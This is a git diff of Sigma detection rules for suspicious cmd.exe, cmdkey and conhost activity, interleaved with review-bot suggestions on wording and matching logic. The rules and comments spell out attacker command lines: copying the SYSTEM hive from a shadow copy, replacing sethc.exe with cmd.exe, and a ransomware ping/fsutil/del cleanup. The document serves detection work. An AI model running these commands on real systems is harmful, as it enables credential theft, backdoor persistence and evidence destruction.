@@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - mklink - HarddiskVolumeShadowCopy condition: process_creation and selection
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml
index f43463677..18e55e61f 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml
@@ -1,9 +1,7 @@
 title: Suspicious File Execution From Internet Hosted WebDav Share id: f0507c0f-a3a2-40f5-acc6-7f543c334993 status: test
-description: Detects the execution of the "net use" command to mount a WebDAV server - and then immediately execute some content in it. As seen being used in malicious - LNK files
+description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files references: - https://twitter.com/ShadowChasing1/status/1552595370961944576 - https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior
@@ -21,15 +19,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|contains: \cmd.exe - - OriginalFileName: Cmd.EXE + - NewProcessName|contains: \cmd.exe + - OriginalFileName: Cmd.EXE selection_base: - CommandLine|contains|all: + CommandLine|contains|all: - ' net use http' - '& start /b ' - \DavWWWRoot\ selection_ext: - CommandLine|contains: + CommandLine|contains: - '.exe ' - '.dll ' - '.bat '
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_no_space_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_no_space_execution.yml
index 8813c172d..7dbb5c300 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_no_space_execution.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_no_space_execution.yml
@@ -1,12 +1,9 @@
 title: Cmd.EXE Missing Space Characters Execution Anomaly id: a16980c2-0c56-4de0-9a79-17971979efdd status: test
-description: 'Detects Windows command lines that miss a space before or after the - /c flag when running a command using the cmd.exe. -
+description: | + Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. This could be a sign of obfuscation of a fat finger problem (typo by the developer). - - ' references: - https://twitter.com/cyb3rops/status/1562072617552678912 - https://ss64.com/nt/cmd.html
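Review bot: The second line of the new `description` block scalar in the no_space_execution hunk, `This could be a sign of obfuscation of a fat finger problem (typo by the developer)`, is carried over unchanged and reads like a typo itself; presumably `obfuscation or a fat finger problem` was meant. Since the commit is already rewriting this scalar into block style, this is the moment to fix the wording. The net_use hunk earlier on this line is whitespace-only.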
@@ -23,19 +20,19 @@ detection: process_creation: EventID: 4688 Channel: Security - selection1: - CommandLine|contains: + selection1: # missing space before the /c + CommandLine|contains: - cmd.exe/c - - \cmd/c + - \cmd/c # just cmd/c would be prone to false positives - '"cmd/c' - cmd.exe/k - - \cmd/k + - \cmd/k # just cmd/k would be prone to false positives - '"cmd/k' - cmd.exe/r - - \cmd/r + - \cmd/r # just cmd/r would be prone to false positives - '"cmd/r' - selection2: - CommandLine|contains: + selection2: # special cases verified via Virustotal Enterprise search + CommandLine|contains: - /cwhoami - /cpowershell - /cschtasks
@@ -46,8 +43,8 @@ detection: - /kschtasks - /kbitsadmin - /kcertutil - selection3: - CommandLine|contains: + selection3: # missing space after the /c + CommandLine|contains: - cmd.exe /c - cmd /c - cmd.exe /k
@@ -55,7 +52,7 @@ detection: - cmd.exe /r - cmd /r filter_generic: - CommandLine|contains: + CommandLine|contains: - 'cmd.exe /c ' - 'cmd /c ' - 'cmd.exe /k '
@@ -63,9 +60,9 @@ detection: - 'cmd.exe /r ' - 'cmd /r ' filter_fp: - - CommandLine|contains: AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules - - CommandLine|endswith: cmd.exe/c . - - CommandLine: cmd.exe /c + - CommandLine|contains: AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules + - CommandLine|endswith: cmd.exe/c . + - CommandLine: cmd.exe /c condition: process_creation and (1 of selection* and not 1 of filter_*) falsepositives: - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml
index fd6f24bc1..9101bb0d5 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml
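Review bot: The new comment `selection3: # missing space after the /c` understates what that block does: its entries (`cmd.exe /c`, `cmd /c`, …) carry no trailing character, so on their own they match every ordinary `cmd /c <command>` invocation, and it is only `filter_generic` (the same strings with a trailing space) under `not 1 of filter_*` in the condition that narrows the match to the no-space case. Suggest `selection3: # missing space after the /c (properly spaced forms are removed by filter_generic)` so the coupling is visible to whoever edits either block later. The other hunks on this line only add comments and re-indent.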
@@ -1,9 +1,7 @@
 title: NtdllPipe Like Activity Execution id: bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2 status: test
-description: Detects command that type the content of ntdll.dll to a different file - or a pipe in order to evade AV / EDR detection. As seen being used in the POC - NtdllPipe
+description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe references: - https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe author: Florian Roth (Nextron Systems)
@@ -19,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - type %windir%\system32\ntdll.dll - type %systemroot%\system32\ntdll.dll - type c:\windows\system32\ntdll.dll
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_path_traversal.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_path_traversal.yml
index 8a2dc199e..1b2a353ac 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_path_traversal.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_path_traversal.yml
@@ -1,8 +1,7 @@
 title: Potential CommandLine Path Traversal Via Cmd.EXE id: 087790e3-3287-436c-bccf-cbd0184a7db1 status: test
-description: Detects potential path traversal attempt via cmd.exe. Could indicate - possible command/argument confusion/hijacking
+description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking references: - https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/ - https://twitter.com/Oddvarmoe/status/1270633613449723905
@@ -20,23 +19,23 @@ detection: EventID: 4688 Channel: Security selection_img: - - ParentProcessName|endswith: \cmd.exe - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: cmd.exe + - ParentProcessName|endswith: \cmd.exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: cmd.exe selection_flags: - - ParentCommandLine|contains: - - /c - - /k - - /r - - CommandLine|contains: - - /c - - /k - - /r + - ParentCommandLine|contains: + - /c + - /k + - /r + - CommandLine|contains: + - /c + - /k + - /r selection_path_traversal: - - ParentCommandLine: /../../ - - CommandLine|contains: /../../ + - ParentCommandLine: /../../ + - CommandLine|contains: /../../ filter_java: - CommandLine|contains: \Tasktop\keycloak\bin\/../../jre\bin\java + CommandLine|contains: \Tasktop\keycloak\bin\/../../jre\bin\java condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Java tools are known to produce false-positive when loading libraries
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml
index 9d09605ec..7528b10fa 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml
@@ -1,8 +1,7 @@
 title: Suspicious Ping/Copy Command Combination id: ded2b07a-d12f-4284-9b76-653e37b6c8b0 status: experimental
-description: Detects uncommon one-liner command having ping and copy at the same time, - which is usually used by malware.
+description: Detects uncommon one-liner command having ping and copy at the same time, which is usually used by malware. references: - Internal Research author: X__Junior (Nextron Systems)
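Review bot: In `selection_path_traversal` the re-indented `- ParentCommandLine: /../../` is an exact-match condition (no modifier) while its sibling `- CommandLine|contains: /../../` is a substring match; a whole parent command line equal to `/../../` will practically never occur, so the parent-side alternative is effectively dead and this looks like a missing `|contains`. Changing it to `- ParentCommandLine|contains: /../../` would make the two alternatives symmetric with `selection_flags`, which already uses `|contains` for both fields. Worth confirming against the upstream rule, as this file appears to be a converted copy and the commit only re-indents it.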
@@ -14,18 +13,19 @@ logsource: category: process_creation product: windows detection: + # Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277 process_creation: EventID: 4688 Channel: Security selection_cmd: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains: + CommandLine|contains: # Count - ' -n ' - ' /n ' - CommandLine|contains|all: - - ping + CommandLine|contains|all: + - ping # Covers "ping" and "ping.exe" - 'copy ' - ' /y ' condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml
index 3aca194ae..d5ea096f6 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml
@@ -1,9 +1,7 @@
 title: Suspicious Ping/Del Command Combination id: 54786ddc-5b8a-11ed-9b6a-0242ac120002 status: test
-description: Detects a method often used by ransomware. Which combines the "ping" - to wait a couple of seconds and then "del" to delete the file in question. Its - used to hide the file responsible for the initial infection for example
+description: Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example references: - https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf
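Review bot: The new inline comment `- ping # Covers "ping" and "ping.exe"` describes the intent, but under `contains|all` a bare `ping` is a plain substring test, so it also matches the sequence inside another word or path (e.g. `mapping`, `shipping`); it is the co-required `'copy '`, `' /y '` and the `-n`/`/n` count switch in `selection_cli` that keep the rule from being noisy. Suggest saying so, e.g. `- ping # Covers "ping" and "ping.exe" (bare substring; the other terms keep this specific)`. The `selection_all` block of the ping_del hunk on the next line carries the same `- ping` entry and comment and would benefit from the same wording.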
@@ -19,24 +17,26 @@ logsource: category: process_creation product: windows detection: + # Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277 + # Example: "C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\User\Desktop\lockbit\lockbit.exe" & Del /f /q "C:\Users\User\Desktop\lockbit\lockbit.exe". process_creation: EventID: 4688 Channel: Security selection_count: - CommandLine|contains: + CommandLine|contains: - ' -n ' - ' /n ' selection_nul: - CommandLine|contains: Nul + CommandLine|contains: Nul # Covers "> Nul" and ">Nul " selection_del_param: - CommandLine|contains: + CommandLine|contains: - ' /f ' - ' -f ' - ' /q ' - ' -q ' selection_all: - CommandLine|contains|all: - - ping + CommandLine|contains|all: + - ping # Covers "ping" and "ping.exe" - 'del ' condition: process_creation and (all of selection_*) falsepositives:
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_redirect.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_redirect.yml
index 3512cb875..99e5c77f1 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_redirect.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_redirect.yml
@@ -1,11 +1,10 @@
 title: CMD Shell Output Redirect id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a related: - - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 - type: similar + - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 + type: similar status: test
-description: Detects the use of the redirection character ">" to redicrect information - in commandline
+description: Detects the use of the redirection character ">" to redicrect information in commandline references: - https://ss64.com/nt/syntax-redirection.html author: frack113
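Review bot: `CommandLine|contains: Nul # Covers "> Nul" and ">Nul "` in `selection_nul` — the value is a bare three-character substring, and Sigma string matching is case-insensitive by default, so besides the two redirect forms named in the comment it also matches any command line containing `null` (PowerShell `$null`, `NullReferenceException`, paths with `null` in them). If the output redirect is what is meant, listing the forms explicitly, e.g. `CommandLine|contains:` with `- '> Nul'` and `- '>Nul '`, is both tighter and self-documenting; at minimum the comment should state that the match is a plain substring and is only kept specific by the other `selection_*` blocks.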
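Review bot: The joined line `+description: Detects the use of the redirection character ">" to redicrect information in commandline` in the cmd_redirect hunk carries the typo `redicrect` into the new text; since the line is being rewritten anyway, change it to `to redirect information in commandline`. The rest of that hunk only re-indents the `related` entries.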
@@ -22,18 +21,17 @@ detection: EventID: 4688 Channel: Security selection_cmd: - - OriginalFileName: Cmd.Exe - - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe selection_cli: - CommandLine|contains: '>' + CommandLine|contains: '>' filter_idm_extension: - CommandLine|contains: + CommandLine|contains: - C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe - chrome-extension:// - \\.\pipe\chrome.nativeMessaging condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Internet Download Manager extensions use named pipes and redirection via CLI. - Filter it out if you use it in your environment + - Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment level: low ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml
index 477ee5997..4fccbf469 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml
@@ -1,13 +1,12 @@
 title: Suspicious CMD Shell Output Redirect id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 related: - - id: aa2efee7-34dd-446e-8a37-40790a66efd7 - type: derived - - id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a - type: similar + - id: aa2efee7-34dd-446e-8a37-40790a66efd7 + type: derived + - id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a + type: similar status: experimental
-description: Detects inline Windows shell commands redirecting output via the ">" - symbol to a suspicious location
+description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ author: Nasreddine Bencherchali (Nextron Systems)
@@ -24,10 +23,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli_1: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious locations as you find them + # The space from the start is missing to cover append operations ">>" - '> \Users\Public\' - '> %APPDATA%\' - '> %TEMP%\'
@@ -45,16 +46,15 @@ detection: - '>C:\Users\Public\' - '>C:\Windows\Temp\' selection_cli_2: - CommandLine|contains: + CommandLine|contains: - ' >' - '">' - - '''>' - CommandLine|contains|all: + - "'>" + CommandLine|contains|all: - C:\Users\ - \AppData\Local\ condition: process_creation and (selection_img and 1 of selection_cli_*) falsepositives: - - Legitimate admin or third party scripts used for diagnostic collection might - generate some false positives + - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives level: medium ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_rmdir_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_rmdir_execution.yml
index a6ede1551..98999925d 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_rmdir_execution.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_rmdir_execution.yml
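Review bot: The new comment `# The space from the start is missing to cover append operations ">>"` in `selection_cli_1` is hard to parse on first read; `# No leading space before ">" so that append redirections (">>") match as well` states the same reason directly. The `# Add more suspicious locations as you find them` line would also be more useful if it named the form to follow, e.g. `# Add more suspicious locations as you find them (">" or "> " followed by the path prefix, as below)`. In the second hunk the change from `'''>'` to `"'>"` is a quoting-style change only, the value is the same.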
@@ -1,18 +1,11 @@
 title: Directory Removal Via Rmdir id: 41ca393d-538c-408a-ac27-cf1e038be80c status: test
-description: 'Detects execution of the builtin "rmdir" command in order to delete - directories. -
+description: | + Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. - - Malware, tools, or other non-native files dropped or created on a system by an - adversary may leave traces to indicate to what was done within a network and how. - - Removal of these files can occur during an intrusion, or as part of a post-intrusion - process to minimize the adversary''s footprint. - - ' + Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. + Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase
@@ -30,12 +23,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_rmdir: - CommandLine|contains: rmdir + CommandLine|contains: rmdir selection_flags: - CommandLine|contains: + CommandLine|contains: - /s - /q condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_shadowcopy_access.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_shadowcopy_access.yml
index 3423e7ed4..d24132a78 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_shadowcopy_access.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_shadowcopy_access.yml
@@ -1,8 +1,7 @@
 title: Copy From VolumeShadowCopy Via Cmd.EXE id: c73124a7-3e89-44a3-bdc1-25fe4df754b1 status: test
-description: Detects the execution of the builtin "copy" command that targets a shadow - copy (sometimes used to copy registry hives that are in use)
+description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use) references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
@@ -21,7 +20,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + # cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ + # There is an additional "\" to escape the special "?" + CommandLine|contains|all: - 'copy ' - \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy condition: process_creation and selection
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_stdin_redirect.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_stdin_redirect.yml
index 5952dd372..a60d3f6e0 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_stdin_redirect.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_stdin_redirect.yml
@@ -1,8 +1,8 @@
 title: Read Contents From Stdin Via Cmd.EXE id: 241e802a-b65e-484f-88cd-c2dc10f9206d related: - - id: 00a4bacd-6db4-46d5-9258-a7d5ebff4003 - type: obsoletes + - id: 00a4bacd-6db4-46d5-9258-a7d5ebff4003 + type: obsoletes status: test description: Detect the use of "<" to read and potentially execute a file via cmd.exe references:
@@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_cmd: - - OriginalFileName: Cmd.Exe - - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe selection_cli: - CommandLine|contains: < + CommandLine|contains: < condition: process_creation and (all of selection_*) falsepositives: - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml
index 056870a47..1008e10c5 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml
@@ -1,12 +1,10 @@
 title: Sticky Key Like Backdoor Execution id: 2fdefcb3-dbda-401e-ae23-f0db027628bc related: - - id: baca5663-583c-45f9-b5dc-ea96a22ce542 - type: derived + - id: baca5663-583c-45f9-b5dc-ea96a22ce542 + type: derived status: test
-description: Detects the usage and installation of a backdoor that uses an option - to register a malicious debugger for built-in tools that are accessible in the - login screen
+description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen references: - https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
@@ -26,7 +24,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - sethc.exe - utilman.exe - osk.exe
@@ -34,7 +32,7 @@ detection: - Narrator.exe - DisplaySwitch.exe ParentProcessName|endswith: \winlogon.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \cscript.exe - \mshta.exe
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml
index cc0fdea26..a466ee9c0 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml
@@ -1,13 +1,9 @@
 title: Persistence Via Sticky Key Backdoor id: 1070db9a-3e5d-412e-8e7b-7183b616e1b3 status: test
-description: 'By replacing the sticky keys executable with the local admins CMD executable, - an attacker is able to access a privileged windows console session without authenticating - to the system. -
+description: | + By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. When the sticky keys are "activated" the privilleged shell is launched. - - ' references: - https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html - https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf
@@ -26,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'copy ' - '/y ' - C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_unusual_parent.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_unusual_parent.yml
index 71bf6bd8e..b311dce75 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_unusual_parent.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_unusual_parent.yml
@@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe ParentProcessName|endswith: - \csrss.exe - \ctfmon.exe
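Review bot: The `description` block scalar introduced in the sticky_keys_replace hunk keeps the unchanged second line `When the sticky keys are "activated" the privilleged shell is launched.`, which carries the typo `privilleged`; as the scalar is being reformatted anyway, correct it to `the privileged shell is launched`. The other hunks on this line are whitespace-only.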
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml b/sigma/builtin/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml
index 2afff6133..65c140427 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml
@@ -1,8 +1,7 @@
 title: New Generic Credentials Added Via Cmdkey.EXE id: b1ec66c6-f4d1-4b5c-96dd-af28ccae7727 status: test
-description: Detects usage of cmdkey to add generic credentials. As an example, this - has to be used before connecting to an RDP session via command line interface.
+description: Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol author: frack113, Nasreddine Bencherchali (Nextron Systems)
@@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmdkey.exe - - OriginalFileName: cmdkey.exe + - NewProcessName|endswith: \cmdkey.exe + - OriginalFileName: cmdkey.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' /g' - ' /u' - ' /p'
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmdkey_recon.yml b/sigma/builtin/process_creation/proc_creation_win_cmdkey_recon.yml
index 9527ac392..9467d1c35 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmdkey_recon.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmdkey_recon.yml
@@ -6,8 +6,7 @@ references: - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx - https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey
-author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron - Systems)
+author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/02/03 tags:
@@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmdkey.exe - - OriginalFileName: cmdkey.exe + - NewProcessName|endswith: \cmdkey.exe + - OriginalFileName: cmdkey.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /l' - ' -l' condition: process_creation and (all of selection*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmstp_execution_by_creation.yml b/sigma/builtin/process_creation/proc_creation_win_cmstp_execution_by_creation.yml
index 0cb8a8b83..89a3fcd4c 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmstp_execution_by_creation.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmstp_execution_by_creation.yml
@@ -1,8 +1,7 @@
 title: CMSTP Execution Process Creation id: 7d4cdc5a-0076-40ca-aac8-f7e714570e47 status: stable
-description: Detects various indicators of Microsoft Connection Manager Profile Installer - execution
+description: Detects various indicators of Microsoft Connection Manager Profile Installer execution references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ author: Nik Seetharaman
@@ -18,6 +17,7 @@ logsource: category: process_creation product: windows detection: + # CMSTP Spawning Child Process process_creation: EventID: 4688 Channel: Security
diff --git a/sigma/builtin/process_creation/proc_creation_win_conhost_legacy_option.yml b/sigma/builtin/process_creation/proc_creation_win_conhost_legacy_option.yml
index 747fc5b9f..0c7afbb88 100644
--- a/sigma/builtin/process_creation/proc_creation_win_conhost_legacy_option.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_conhost_legacy_option.yml
@@ -1,9 +1,7 @@
 title: Suspicious High IntegrityLevel Conhost Legacy Option id: 3037d961-21e9-4732-b27a-637bcc7bf539 status: test
-description: ForceV1 asks for information directly from the kernel space. Conhost - connects to the console application. High IntegrityLevel means the process is - running with elevated privileges, such as an Administrator context.
+description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context. references: - https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29 - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/
@@ -21,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - conhost.exe - '0xffffffff' - -ForceV1
diff --git a/sigma/builtin/process_creation/proc_creation_win_conhost_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_conhost_susp_child_process.yml
index fef8c0bd6..2e35d884f 100644
--- a/sigma/builtin/process_creation/proc_creation_win_conhost_susp_child_process.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_conhost_susp_child_process.yml
@@ -1,8 +1,7 @@
 title: Uncommon Child Process Of Conhost.EXE id: 7dc2dedd-7603-461a-bc13-15803d132355 status: experimental
-description: Detects uncommon "conhost" child processes. This could be a sign of "conhost" - usage as a LOLBIN or potential process injection activity.
+description: Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity. references: - http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ author: omkar72
@@ -21,15 +20,14 @@ detection: selection: ParentProcessName|endswith: \conhost.exe filter_main_conhost: - NewProcessName|endswith: :\Windows\System32\conhost.exe + NewProcessName|endswith: :\Windows\System32\conhost.exe filter_main_null: - NewProcessName: null + NewProcessName: filter_main_empty: - NewProcessName: '' + NewProcessName: '' filter_optional_provider: - Provider_Name: SystemTraceProvider-Process - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + Provider_Name: SystemTraceProvider-Process # Race condition with SystemTrace doesn't provide all fields. + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium
diff --git a/sigma/builtin/process_creation/proc_creation_win_conhost_uncommon_parent.yml b/sigma/builtin/process_creation/proc_creation_win_conhost_uncommon_parent.yml
index 8a9fee794..35ec16bd2 100644
--- a/sigma/builtin/process_creation/proc_creation_win_conhost_uncommon_parent.yml
